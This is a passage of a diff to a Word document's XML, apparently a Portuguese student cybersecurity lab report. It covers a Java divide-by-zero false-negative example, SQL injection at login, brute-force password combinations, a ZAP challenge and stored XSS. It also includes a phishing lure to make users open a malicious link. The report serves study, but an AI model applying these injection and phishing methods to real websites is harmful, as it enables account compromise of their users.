-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-        <w:t>(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-        <w:t>divide(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-        <w:t>4, 0)</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-        <w:t>);</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t>}</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t>}</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t>No entanto um falso negativo ocorre quando a ferramenta não apanha uma vulnerabiliade real no código, utilizando o mesmo exemplo:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-        <w:t>public class Division {</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    public static double </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-        <w:t>divide(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-        <w:t>double a, double b) {</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-        <w:t xml:space="preserve">        return a / </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-        <w:t>b;</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    }</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    public static void </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-        <w:t>main(String[</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-        <w:t xml:space="preserve">] </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-        <w:t>args</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-        <w:t>) {</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-        <w:t xml:space="preserve">        </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-        <w:t>System.out.println</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-        <w:t>(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-        <w:t>divide(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-        <w:t>4, 2)</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-        <w:t>);</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-        <w:t xml:space="preserve">        </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-        <w:t>System.out.println</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-        <w:t>(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-        <w:t>divide(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-        <w:t>4, 0)</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-        <w:t>);</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t>}</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t>}</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Se a ferramenta não identificar esta vulnerabilidade pode causar um erro de execução em runtime e, por exemplo, expor informações sobre a aplicacação (o stack tecnologico, </w:t>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -6488,12 +7130,12 @@
           <w:lang w:val="pt-PT"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
+      <w:bookmarkStart w:id="14" w:name="_Toc213038603"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
         <w:t>D</w:t>
       </w:r>
       <w:r>
@@ -6526,6 +7168,7 @@
         </w:rPr>
         <w:t>vulnerabilidades</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="14"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -6546,6 +7189,7 @@
           <w:lang w:val="pt-PT"/>
         </w:rPr>
       </w:pPr>
+      <w:bookmarkStart w:id="15" w:name="_Toc213038604"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -6553,6 +7197,7 @@
         </w:rPr>
         <w:t>Login</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="15"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -6622,6 +7267,7 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:lang w:val="pt-PT"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">Injetar código SQL que altere a </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
@@ -6933,6 +7579,7 @@
           <w:lang w:val="pt-PT"/>
         </w:rPr>
       </w:pPr>
+      <w:bookmarkStart w:id="16" w:name="_Toc213038605"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -6963,6 +7610,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> password</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="16"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -7076,9 +7724,9 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
+          <w:noProof/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7ADEA235" wp14:editId="2158B95C">
             <wp:extent cx="5400040" cy="2889885"/>
@@ -7128,6 +7776,7 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:lang w:val="pt-PT"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">Deu-se uso a uma </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
@@ -7176,14 +7825,7 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:lang w:val="pt-PT"/>
         </w:rPr>
-        <w:t>3}</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> capaz de gerar todas as combinações para </w:t>
+        <w:t xml:space="preserve">3} capaz de gerar todas as combinações para </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -7272,6 +7914,7 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:noProof/>
           <w:lang w:val="pt-PT"/>
         </w:rPr>
         <w:drawing>
@@ -7330,20 +7973,15 @@
           <w:lang w:val="pt-PT"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Zap </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t>desafio</w:t>
-      </w:r>
+      <w:bookmarkStart w:id="17" w:name="_Toc213038606"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>Zap desafio</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="17"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -7479,6 +8117,7 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:noProof/>
           <w:lang w:val="pt-PT"/>
         </w:rPr>
         <w:drawing>
@@ -7536,7 +8175,6 @@
           <w:noProof/>
           <w:lang w:val="pt-PT"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>É possivel verificar que o pedido foi aceite e ficou publicado noutro utilizador</w:t>
       </w:r>
     </w:p>
@@ -7552,6 +8190,7 @@
           <w:lang w:val="pt-PT"/>
         </w:rPr>
       </w:pPr>
+      <w:bookmarkStart w:id="18" w:name="_Toc213038607"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -7575,6 +8214,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> (XSS)</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="18"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -7591,13 +8231,27 @@
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
         </w:rPr>
-        <w:t xml:space="preserve">O elemento HTML </w:t>
+        <w:t xml:space="preserve">O </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
         </w:rPr>
+        <w:t>elemento</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> HTML </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
         <w:t>usado</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
@@ -7605,13 +8259,7 @@
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
         </w:rPr>
-        <w:t xml:space="preserve"> é </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-        <w:t>&lt;span _</w:t>
+        <w:t xml:space="preserve"> é &lt;span _</w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -7717,7 +8365,15 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:lang w:val="pt-BR"/>
         </w:rPr>
-        <w:t>, visto não ter qualquer tipo de sanitização por parte da aplicação</w:t>
+        <w:t xml:space="preserve">, visto não ter qualquer tipo de sanitização por parte da </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-BR"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>aplicação</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -7729,6 +8385,7 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:noProof/>
           <w:lang w:val="pt-BR"/>
         </w:rPr>
         <w:drawing>
@@ -7819,6 +8476,7 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:noProof/>
           <w:lang w:val="pt-BR"/>
         </w:rPr>
         <w:drawing>
@@ -7921,18 +8579,12 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>Cross-site Scripting (XSS)</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
+      <w:bookmarkStart w:id="19" w:name="_Toc213038608"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Cross-site Scripting (XSS) </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -7947,6 +8599,7 @@
         </w:rPr>
         <w:t>aques</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="19"/>
       <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
@@ -8058,6 +8711,7 @@
         <w:rPr>
           <w:lang w:val="pt-BR"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>Enviar um email para utilizadores do website a incentivar o acesso do mesmo através do link malicioso, por exemplo, “Vem ver quantos gostos o teu post já tem”</w:t>
       </w:r>
     </w:p>
@@ -8124,6 +8778,7 @@
       </w:pPr>
       <w:r>
         <w:rPr>
+          <w:noProof/>
           <w:lang w:val="pt-BR"/>
         </w:rPr>
         <w:drawing>
@@ -10671,6 +11326,7 @@
   <w:style w:type="character" w:default="1" w:styleId="DefaultParagraphFont">
     <w:name w:val="Default Paragraph Font"/>
     <w:uiPriority w:val="1"/>
+    <w:semiHidden/>
     <w:unhideWhenUsed/>
   </w:style>
   <w:style w:type="table" w:default="1" w:styleId="TableNormal">

--- a/TP2/GN11_TP2.docx
+++ b/TP2/GN11_TP2.docx
@@ -7,11 +7,13 @@
         <w:pStyle w:val="Title"/>
         <w:jc w:val="center"/>
         <w:rPr>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:lang w:val="pt-PT"/>
         </w:rPr>
         <w:t>Cibersegurança</w:t>
@@ -22,6 +24,7 @@
         <w:pStyle w:val="Subtitle"/>
         <w:jc w:val="center"/>
         <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:lang w:val="pt-PT"/>
         </w:rPr>
       </w:pPr>
@@ -31,6 +34,7 @@
         <w:pStyle w:val="Subtitle"/>
         <w:jc w:val="center"/>
         <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:lang w:val="pt-PT"/>
         </w:rPr>
       </w:pPr>
@@ -40,11 +44,13 @@
         <w:pStyle w:val="Subtitle"/>
         <w:jc w:val="center"/>
         <w:rPr>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:lang w:val="pt-PT"/>
         </w:rPr>
         <w:t>Trabalho do módulo 2, parte 1 e 2</w:t>
@@ -53,6 +59,7 @@
     <w:p>
       <w:pPr>
         <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:b/>
           <w:bCs/>
           <w:lang w:val="pt-PT"/>
@@ -62,11 +69,13 @@
     <w:p>
       <w:pPr>
         <w:rPr>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:b/>
           <w:bCs/>
           <w:lang w:val="pt-PT"/>
@@ -75,6 +84,7 @@
       </w:r>
       <w:r>
         <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:lang w:val="pt-PT"/>
         </w:rPr>
         <w:t>: Noturno</w:t>
@@ -83,11 +93,13 @@
     <w:p>
       <w:pPr>
         <w:rPr>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:b/>
           <w:bCs/>
           <w:lang w:val="pt-PT"/>
@@ -96,6 +108,7 @@
       </w:r>
       <w:r>
         <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:lang w:val="pt-PT"/>
         </w:rPr>
         <w:t>: G11</w:t>
@@ -104,11 +117,13 @@
     <w:p>
       <w:pPr>
         <w:rPr>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:b/>
           <w:bCs/>
           <w:lang w:val="pt-PT"/>
@@ -117,6 +132,7 @@
       </w:r>
       <w:r>
         <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:lang w:val="pt-PT"/>
         </w:rPr>
         <w:t xml:space="preserve">: </w:t>
@@ -125,23 +141,27 @@
     <w:p>
       <w:pPr>
         <w:rPr>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:lang w:val="pt-PT"/>
         </w:rPr>
         <w:t xml:space="preserve">- Alexandre Silva </w:t>
       </w:r>
       <w:r>
         <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:lang w:val="pt-PT"/>
         </w:rPr>
         <w:tab/>
       </w:r>
       <w:r>
         <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:lang w:val="pt-PT"/>
         </w:rPr>
